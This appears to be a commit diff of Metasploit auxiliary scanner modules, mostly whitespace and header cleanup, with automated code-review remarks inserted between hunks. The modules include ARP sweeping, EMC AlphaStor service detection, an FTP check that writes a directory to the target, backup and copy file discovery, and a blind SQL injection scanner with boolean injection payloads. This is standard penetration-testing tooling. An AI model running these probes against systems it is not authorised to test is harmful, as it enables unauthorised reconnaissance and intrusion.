|
||||
|
||||
|
||||
live = dcerpc_mgmt_is_server_listening(rport)
|
||||
print_status("\t listening: %.8x" % live) if live
|
||||
|
||||
@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
princ = dcerpc_mgmt_inq_princ_name(rport)
|
||||
print_status("\t name: #{princ.unpack("H*")[0]}") if princ
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
@ -1,5 +1,15 @@
|
||||
require 'msf/core'
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'ARP Sweep Local Network Discovery',
|
||||
@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'belch',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([
|
||||
OptString.new('SHOST', [true, "Source IP Address"]),
|
||||
OptString.new('SMAC', [true, "Source MAC Address"]),
|
||||
], self.class)
|
||||
|
||||
|
||||
deregister_options('SNAPLEN', 'FILTER')
|
||||
end
|
||||
|
||||
@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_batch(hosts)
|
||||
|
||||
shost = datastore['SHOST']
|
||||
|
||||
shost = datastore['SHOST']
|
||||
smac = datastore['SMAC']
|
||||
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
|
||||
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
|
||||
|
||||
begin
|
||||
|
||||
|
||||
hosts.each do |dhost|
|
||||
probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost)
|
||||
capture.inject(probe)
|
||||
@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||
while(reply = getreply())
|
||||
next if not reply[:arp]
|
||||
print_status("#{reply[:arp].spa} appears to be up.")
|
||||
|
||||
|
||||
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
etime = Time.now.to_f + (hosts.length * 0.05)
|
||||
while (Time.now.to_f < etime)
|
||||
while(reply = getreply())
|
||||
next if not reply[:arp]
|
||||
print_status("#{reply[:arp].spa} appears to be up.")
|
||||
|
||||
|
||||
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
|
||||
end
|
||||
Kernel.select(nil, nil, nil, 0.50)
|
||||
end
|
||||
|
||||
|
||||
ensure
|
||||
close_pcap()
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def buildprobe(shost, smac, dhost)
|
||||
n = Racket::Racket.new
|
||||
n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14))
|
||||
n.l2.src_mac = smac
|
||||
n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff'
|
||||
n.l2.ethertype = 0x0806
|
||||
|
||||
|
||||
n.l3 = Racket::L3::ARP.new
|
||||
n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST
|
||||
n.l3.sha = n.l2.src_mac
|
||||
@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.tpa = dhost
|
||||
n.pack
|
||||
end
|
||||
|
||||
|
||||
def getreply
|
||||
pkt = capture.next
|
||||
return if not pkt
|
||||
|
||||
|
||||
eth = Racket::L2::Ethernet.new(pkt)
|
||||
return if not eth.ethertype == 0x0806
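Review bot: `run_batch` assigns `shost = datastore['SHOST']` and `smac = datastore['SMAC']` and then calls `buildprobe(datastore['SHOST'], datastore['SMAC'], dhost)`, so in the visible lines the two locals are dead; `probe = buildprobe(shost, smac, dhost)` uses them and reads the datastore once. The reply-draining loop (`while(reply = getreply())` ... `report_host(...)`) is duplicated verbatim inside the per-host loop and again in the timed tail, and would be clearer as one private helper called from both places. In `getreply`, `return if not eth.ethertype == 0x0806` parses as `not (a == b)` and is better written `return unless eth.ethertype == 0x0806`. One line of `run_batch` between the `@ -32,14 +42,14` and `@ -47,34 +57,34` hunks is not shown, and `getreply` continues past the last hunk.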
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -10,10 +14,10 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'EMC AlphaStor Device Manager Service.',
|
||||
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(3000),], self.class)
|
||||
end
|
||||
|
||||
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect
|
||||
|
||||
pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(0.25)
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Host #{ip} is running the EMC AlphaStor Device Manager.")
|
||||
else
|
||||
print_error("Host #{ip} is not running the service...")
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -10,10 +14,10 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'EMC AlphaStor Library Manager Service.',
|
||||
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(3500),], self.class)
|
||||
end
|
||||
|
||||
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect
|
||||
|
||||
pkt = "\x51" + "\x00" * 529
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(1)
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Host #{ip} is running the EMC AlphaStor Library Manager.")
|
||||
else
|
||||
print_error("Host #{ip} is not running the service...")
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(target_host)
|
||||
|
||||
begin
|
||||
|
||||
|
||||
res = connect_login(true, false)
|
||||
|
||||
banner.strip! if banner
|
||||
|
||||
dir = Rex::Text.rand_text_alpha(8)
|
||||
if res
|
||||
if res
|
||||
write_check = send_cmd( ['MKD', dir] , true)
|
||||
|
||||
if (write_check and write_check =~ /^2/)
|
||||
@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionError, ::IOError
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
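Review bot: The `rescue ::Rex::ConnectionError, ::IOError` clause at the end of `run_host` has an empty body, so a host that refuses or resets the connection is reported exactly like one that was never reached; `rescue ::Rex::ConnectionError, ::IOError => e` followed by `vprint_error("#{target_host} : #{e.class} #{e}")` keeps the scanner quiet by default while making the cause visible under VERBOSE. The write test `send_cmd( ['MKD', dir] , true)` creates a directory on the target; whether it is removed again is not visible here (the lines between the `@ -37,13 +41,13` and `@ -64,11 +68,11` hunks are not shown), so a comment stating that the probe leaves an artifact, or an `RMD` cleanup when the `MKD` succeeded, is worth confirming. `run_host` spans both hunks with part of its body outside them.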
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Backup File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of possible copies
|
||||
This module identifies the existence of possible copies
|
||||
of a specific file in a given path.
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.copy',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.temp',
|
||||
'.txt',
|
||||
@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{file}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'BACKUP_FILE',
|
||||
:data => "#{file}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{file}")
|
||||
print_status("NOT Found #{wmap_base_url}#{file}")
|
||||
#To be removed or just displayed with verbose debugging.
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of Blind SQL injection issues
|
||||
This module identifies the existence of Blind SQL injection issues
|
||||
in GET Query parameters values.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('METHOD', [true, "HTTP Method","GET"]),
|
||||
@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('QUERY', [ false, "HTTP URI Query", '']),
|
||||
OptString.new('DATA', [ false, "HTTP Body Data", '']),
|
||||
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
gvars = nil
|
||||
pvars = nil
|
||||
cvars = nil
|
||||
|
||||
rnum=rand(10000)
|
||||
|
||||
|
||||
rnum=rand(10000)
|
||||
|
||||
valstr = [
|
||||
[ 'numeric',
|
||||
[ 'numeric',
|
||||
" AND #{rnum}=#{rnum} ",
|
||||
" AND #{rnum}=#{rnum+1} "
|
||||
],
|
||||
[ 'single quotes',
|
||||
],
|
||||
[ 'single quotes',
|
||||
"' AND '#{rnum}'='#{rnum}",
|
||||
"' AND '#{rnum}'='#{rnum+1}"
|
||||
],
|
||||
[ 'double quotes',
|
||||
[ 'double quotes',
|
||||
"\" AND \"#{rnum}\"=\"#{rnum}",
|
||||
"\" AND \"#{rnum}\"=\"#{rnum+1}"
|
||||
]
|
||||
@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
# Dealing with empty query/data and making them hashes.
|
||||
#
|
||||
|
||||
|
||||
if !datastore['QUERY'] or datastore['QUERY'].empty?
|
||||
datastore['QUERY'] = nil
|
||||
gvars = nil
|
||||
else
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
end
|
||||
|
||||
|
||||
if !datastore['DATA'] or datastore['DATA'].empty?
|
||||
datastore['DATA'] = nil
|
||||
pvars = nil
|
||||
else
|
||||
pvars = queryparse(datastore['DATA'])
|
||||
end
|
||||
|
||||
|
||||
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
|
||||
datastore['COOKIE'] = nil
|
||||
cvars = nil
|
||||
@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#SEND NORMAL REQUEST
|
||||
|
||||
#SEND NORMAL REQUEST
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
sigtxt = ""
|
||||
|
||||
|
||||
if normalres
|
||||
if normalres.body.empty?
|
||||
print_error("No body to obtain signature")
|
||||
return
|
||||
else
|
||||
sigtxt = normalres.body
|
||||
#print_status("#{sigtxt}")
|
||||
#print_status("#{sigtxt}")
|
||||
end
|
||||
else
|
||||
print_error("No response")
|
||||
return
|
||||
end
|
||||
|
||||
#print_status("Normal request sent.")
|
||||
|
||||
#print_status("Normal request sent.")
|
||||
|
||||
valstr.each do |tarr|
|
||||
|
||||
|
||||
#QUERY
|
||||
if gvars
|
||||
gvars.each do |key,value|
|
||||
gvars.each do |key,value|
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
#SEND TRUE REQUEST
|
||||
gvars[key] = gvars[key]+tarr[1]
|
||||
|
||||
|
||||
|
||||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if normalres and trueres
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
normalsize = normalres.body.length
|
||||
|
||||
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
|
||||
|
||||
if reltruesize == normalsize
|
||||
|
||||
if reltruesize == normalsize
|
||||
#If true it means that we have a small better chance of this being a blind sql injection.
|
||||
|
||||
#SEND FALSE REQUEST
|
||||
gvars[key] = gvars[key]+tarr[2]
|
||||
|
||||
|
||||
gvars[key] = gvars[key]+tarr[2]
|
||||
|
||||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
|
||||
#true_false_dist = edit_distance(falseres.body,trueres.body)
|
||||
|
||||
|
||||
|
||||
#print_status("rellenf #{relfalsesize}")
|
||||
|
||||
if reltruesize > relfalsesize
|
||||
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
|
||||
)
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
end
|
||||
else
|
||||
print_status("NO False Response.")
|
||||
print_status("NO False Response.")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
else
|
||||
print_status("Normal and True requests are different.")
|
||||
@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
#DATA
|
||||
|
||||
|
||||
if pvars
|
||||
pvars.each do |key,value|
|
||||
pvars.each do |key,value|
|
||||
pvars = queryparse(datastore['DATA']) #Now its a Hash
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
#SEND TRUE REQUEST
|
||||
pvars[key] = pvars[key]+tarr[1]
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if normalres and trueres
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
normalsize = normalres.body.length
|
||||
|
||||
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
|
||||
|
||||
if reltruesize == normalsize
|
||||
|
||||
if reltruesize == normalsize
|
||||
#If true it means that we have a small better chance of this being a blind sql injection.
|
||||
|
||||
#SEND FALSE REQUEST
|
||||
pvars[key] = pvars[key]+tarr[2]
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
pvarstr << '&'
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => pvarstr
|
||||
}, 20)
|
||||
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
|
||||
#true_false_dist = edit_distance(falseres.body,trueres.body)
|
||||
|
||||
|
||||
|
||||
#print_status("rellenf #{relfalsesize}")
|
||||
|
||||
if reltruesize > relfalsesize
|
||||
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
|
||||
)
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
end
|
||||
else
|
||||
print_status("NO False Response.")
|
||||
print_status("NO False Response.")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
else
|
||||
print_status("Normal and True requests are different.")
|
||||
@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("No response.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
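Review bot: The manual body join `pvarstr = ""` / `pvars.each do |tkey,tvalue|` / `if pvarstr` / `pvarstr << '&'` always emits a leading `&`, because an empty String is truthy in Ruby, so every DATA-branch probe goes out as `&key=value...` while the baseline request sends `datastore['DATA']` untouched; a server that treats that empty first pair differently would skew the length comparison this scanner uses to decide "vulnerable". The guard should be `pvarstr << '&' unless pvarstr.empty?`; the same pattern recurs in the true-request build earlier in this section and in the DATA branch of the error-based scanner section later in this commit. Separately, `trueres.body.scan(/#{tarr[1]}/)` interpolates the payload into a regex unescaped — it happens to be safe for the three fixed payloads here, but `Regexp.escape(tarr[1])` makes that intent explicit. `run_host` is split across several hunks, so these lines are shown without their enclosing method.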
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Copy File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of possible copies
|
||||
This module identifies the existence of possible copies
|
||||
of a specific file in a given path.
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
conn = true
|
||||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
prestr = [
|
||||
'Copy_(1)_of_',
|
||||
'Copy_(2)_of_',
|
||||
@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Copy',
|
||||
'_'
|
||||
]
|
||||
|
||||
|
||||
|
||||
tpathf = datastore['PATH']
|
||||
testf = tpathf.split('/').last
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
#
|
||||
begin
|
||||
randfile = Rex::Text.rand_text_alpha(5).chomp
|
||||
filec = tpathf.sub(testf,randfile + testf)
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => filec,
|
||||
'method' => 'GET',
|
||||
@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
|
||||
|
||||
File.open(datastore['HTTP404Sigs']).each do |str|
|
||||
if(res.body.index(str))
|
||||
emesg = str
|
||||
@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
return if not conn
|
||||
@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if testf
|
||||
prestr.each do |pre|
|
||||
filec = tpathf.sub(testf,pre + testf)
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
